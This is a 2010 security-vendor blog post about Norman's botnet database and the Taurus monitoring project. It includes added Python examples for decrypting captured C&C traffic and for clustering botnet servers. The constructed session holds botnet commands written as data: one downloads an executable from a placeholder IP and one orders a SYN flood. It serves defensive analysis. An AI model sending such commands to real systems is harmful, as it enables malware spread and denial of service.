November 15, 2010
The Dutch National High Tech Crime Unit (NHTCU), the cyber-crime division of the Dutch national police (KLPD), today recognized Norman ASA's forensic contributions in assisting multinational police agencies with monitoring and disabling large, international cybercrime botnets. The recognition came in a presentation at the GOVCERT.NL Symposium, which detailed the Taurus Botnet Monitoring project coordinated by the government agencies. Norman made its full Botnet Database available to the authorities: a collection of detailed botnet information, updated 24×7, that contains what is needed to access the Command and Control (C&C) servers and botnet channels. The database was loaded into a special tool that monitors all the different botnets and collects the commands sent by the C&C servers to the infected systems.
Norman's participation in the Taurus project started with making our extensive Botnet Database available to the project. How does Norman build that database?
Every piece of potentially malicious code is run in the Norman SandBox via the Norman SandBox Analyzer. This reveals the behaviour of the sample, which is then documented. If the sample connects to C&C servers, we store the full communication, which gives a good overview of what the C&C server is telling the bot (and the botnet).
Since that communication can be encrypted, we use SandBox Analyzer Pro to identify the encryption algorithm(s) the sample uses.
Once the algorithm is known, retrieving the encryption key(s) from the sample is straightforward. With both the algorithm(s) and the key(s) in hand, all of the communication can be decrypted, read and stored.
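As an added example (not Norman's tooling, and not code from the post), here is what the last step looks like once the sandbox has handed over the cipher and the key: decrypt the captured session, sanity-check that the result is really the protocol we expect, and pull the C&C server, channel, channel password and commands out of it into a database record. The cipher is assumed to be RC4 and the command channel IRC-style; the key, the server address and the session traffic are all constructed for the example (documentation IP ranges), and the "capture" is produced by encrypting that constructed session with the same key.

```python
"""Decrypt a captured C&C session with the cipher and key recovered from the
sample, then extract the fields that go into a botnet database record.
Added example; RC4 and the IRC-style protocol are assumptions, the key and
the traffic are constructed."""
import re


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + keystream XOR).  Symmetric: the same call
    encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Key "recovered" from the sample -- constructed for this example.
RECOVERED_KEY = b"b0tk3y"

# Constructed plaintext of one session (bot -> C&C, then C&C -> bot), encrypted
# with the recovered key so it stands in for what the sandbox captured.
_SESSION = (
    b"NICK [XP|DEU]493817\r\n"
    b"JOIN #Matrizzz makako123\r\n"
    b":op!op@c2.example.net PRIVMSG #Matrizzz :.dl http://198.51.100.7/upd.exe\r\n"
    b":op!op@c2.example.net PRIVMSG #Matrizzz :.syn 203.0.113.55 80 120\r\n"
)
CAPTURED = rc4(RECOVERED_KEY, _SESSION)

JOIN_RE = re.compile(rb"^JOIN (#\S+)(?: (\S+))?$")
CMD_RE = re.compile(rb"^:\S+ PRIVMSG #\S+ :(.+)$")


def looks_like_irc(plain: bytes) -> bool:
    """A wrong algorithm or key gives high-entropy garbage; a real IRC-style
    session is printable ASCII with CRLF line endings."""
    return bool(plain) and all(0x20 <= b <= 0x7E or b in b"\r\n\t" for b in plain)


def decode_session(ciphertext: bytes, key: bytes, server: str):
    """Return a database record for the session, or None if the decryption
    does not look like C&C traffic (i.e. the key/cipher guess is wrong).
    `server` is the address the sandbox saw the sample connect to."""
    plain = rc4(key, ciphertext)
    if not looks_like_irc(plain):
        return None
    rec = {"server": server, "channel": None, "password": None, "commands": []}
    for line in plain.split(b"\r\n"):
        m = JOIN_RE.match(line)
        if m:
            rec["channel"] = m.group(1).decode()
            rec["password"] = m.group(2).decode() if m.group(2) else None
            continue
        m = CMD_RE.match(line)
        if m:
            rec["commands"].append(m.group(1).decode())
    return rec


if __name__ == "__main__":
    print(decode_session(CAPTURED, RECOVERED_KEY, "192.0.2.10"))
    print(decode_session(CAPTURED, b"wrong-key", "192.0.2.10"))  # None
```

The `looks_like_irc` check is the part worth keeping in a real pipeline: when a family rotates keys per build, a silently wrong key produces a record full of garbage, and a plausibility test on the plaintext is what keeps that out of the database.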
Now, besides storing all the domains, IPs, credentials, etc. of all the botnets, and which samples relate to which botnets, what more can you do with that data besides using it to take the botnets down?
For one, you can get a chronological overview of the systems that have been used as C&C servers by botnets.
Another option is to correlate the data, and that actually yields some interesting information. To demonstrate this with some older data: in 2007 I made a screen dump from the Botnet database in our Analysis Desktop, showing a botnet that was new at the time. It showed three different pieces of unique malware all connecting to the same channel (Matrizzz) of the botnet on the same C&C server.
I repeated that exercise today for the presentation, and it showed that the Matrizzz channel on this server has since been accessed a few more times. It also shows that a similarly named channel (matrizzzz) is present on another server. Examining the code confirmed that this is indeed related.
Looking at the data for that server, we can see that this C&C server is actually hosting two botnet channels. I could go deeper into the second channel, but the phrase "matrix" is used a lot across a wide variety of botnets and channels, so that would not reveal much.
If we continue with the channel we started from, it is noticeable that the channel password everywhere contains the phrase "makako123". Searching on that phrase brings up yet another server.
And on that server, there is another channel. This exercise could continue for a few more cycles, revealing more and more information and more and more interlinked nodes. A nice graph is building. If we did this for every botnet, we would see that specific servers are part of multiple botnets and that there is a big overlap.
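The pivoting described above (same server, same-looking channel name, same channel password, repeated until nothing new turns up) is a breadth-first walk over the records, and it is worth writing down because the "matrix is everywhere" caveat is exactly what goes wrong when you automate it naively. The following is an added example, not Norman's Analysis Desktop or its data: the records, servers (documentation IP ranges), channel names and passwords are constructed to mirror the walk in the post. It generalizes the post's manual search in one way: a pivot key that touches more distinct servers than a threshold is treated as too generic to follow, which is how the over-used "#matrix" channel name gets excluded automatically.

```python
"""Pivot through botnet C&C records: start at one channel and follow shared
servers, normalized channel names and channel passwords until the cluster
stops growing.  Added example with constructed records."""
import re
from collections import defaultdict, deque

# Constructed records: (sample id, C&C server, IRC channel, channel password).
RECORDS = [
    ("sample-01", "203.0.113.10", "#Matrizzz",  "makako123"),
    ("sample-02", "203.0.113.10", "#Matrizzz",  "makako123"),
    ("sample-03", "203.0.113.10", "#Matrizzz",  "makako123"),
    ("sample-04", "203.0.113.10", "#matrix",    "hunter2"),    # second channel on the same box
    ("sample-05", "198.51.100.5", "#matrizzzz", "makako123"),  # channel-name variant elsewhere
    ("sample-06", "192.0.2.77",   "#loader",    "makako123"),  # only reachable via the password
    ("sample-07", "192.0.2.78",   "#matrix",    "qwerty"),     # "matrix" shows up everywhere...
    ("sample-08", "192.0.2.79",   "#matrix",    "letmein"),
    ("sample-09", "192.0.2.80",   "#matrix",    "abc123"),
    ("sample-10", "198.18.0.1",   "#updates",   "zzz"),        # unrelated botnet
]


def normalize_channel(name: str) -> str:
    """Lower-case, drop the '#', collapse repeated letters so that Matrizzz
    and matrizzzz become the same key ('matriz') while 'matrix' does not."""
    name = name.lower().lstrip("#")
    return re.sub(r"(.)\1+", r"\1", name)


def record_keys(rec):
    """The three things the post pivots on, as (kind, value) keys."""
    _, server, channel, password = rec
    return {
        ("server", server),
        ("channel", normalize_channel(channel)),
        ("password", password),
    }


def build_index(records, max_fanout=3):
    """Map each key to the record indices carrying it, and flag keys that span
    more than `max_fanout` distinct servers as too generic to pivot on."""
    index = defaultdict(set)
    for i, rec in enumerate(records):
        for key in record_keys(rec):
            index[key].add(i)
    generic = {
        key for key, idxs in index.items()
        if len({records[i][1] for i in idxs}) > max_fanout
    }
    return index, generic


def pivot(records, start_index, max_fanout=3):
    """Breadth-first expansion from one record.  Returns the sorted list of
    servers in the cluster and the edges (from sample, key, to sample) that
    linked each new record in, i.e. the graph the post talks about."""
    index, generic = build_index(records, max_fanout)
    seen = {start_index}
    queue = deque([start_index])
    edges = []
    while queue:
        i = queue.popleft()
        for key in record_keys(records[i]):
            if key in generic:        # e.g. ("channel", "matrix"): skip it
                continue
            for j in index[key]:
                if j not in seen:
                    seen.add(j)
                    edges.append((records[i][0], key, records[j][0]))
                    queue.append(j)
    servers = sorted({records[i][1] for i in seen})
    return servers, edges


if __name__ == "__main__":
    servers, edges = pivot(RECORDS, 0)
    print("cluster servers:", servers)
    for src, key, dst in edges:
        print(f"  {src} --{key[0]}={key[1]}--> {dst}")
```

With the constructed records the walk from the first Matrizzz sample picks up the second channel on the same server, the matrizzzz server and the server found through the "makako123" password, and stops there: the "#matrix" key spans four servers, so it is dropped as generic and the three unrelated "#matrix" servers stay out of the cluster. The threshold is a tunable; set it too high and every IRC botnet that ever used "#matrix" collapses into one blob.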
And before you know it, what seems to be Chaos is actually Organized.
Funnily enough, the same graphs can be made about Who knows Who on social networks…